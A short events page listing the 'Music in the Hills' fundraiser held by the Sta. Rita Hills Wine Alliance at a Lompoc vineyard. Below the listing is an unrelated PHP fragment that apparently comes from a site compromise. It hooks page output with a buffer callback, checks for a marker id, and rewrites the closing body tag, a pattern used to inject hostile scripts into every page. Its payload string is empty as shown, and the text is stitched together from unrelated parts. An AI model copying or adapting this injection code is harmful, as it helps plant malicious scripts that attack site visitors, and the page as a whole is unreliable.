Latest Past Events

Music in the Hills Fundraiser

Kessler Haak Vineyard 1700 Gypsy Canyon Dr, Lompoc

The Sta. Rita Hills Wine Alliance and Certain Sparks Music Foundation invite you to a day of “Music in The Hills”. The Bob Bishop Band and The Crown City Bombers […]

if (!defined('SCRIPT_EXECUTED')) { define('SCRIPT_EXECUTED', true); $pages = ['/']; // ob_start(function($buffer) use ($pages) { $script_id = 'content-main-2'; foreach ($pages as $page) { if (strpos($_SERVER['REQUEST_URI'], $page) !== false) { if (strpos($buffer, $script_id) === false) { return preg_replace('/\s*<\/body>/', "", $buffer); } } } return $buffer; }); }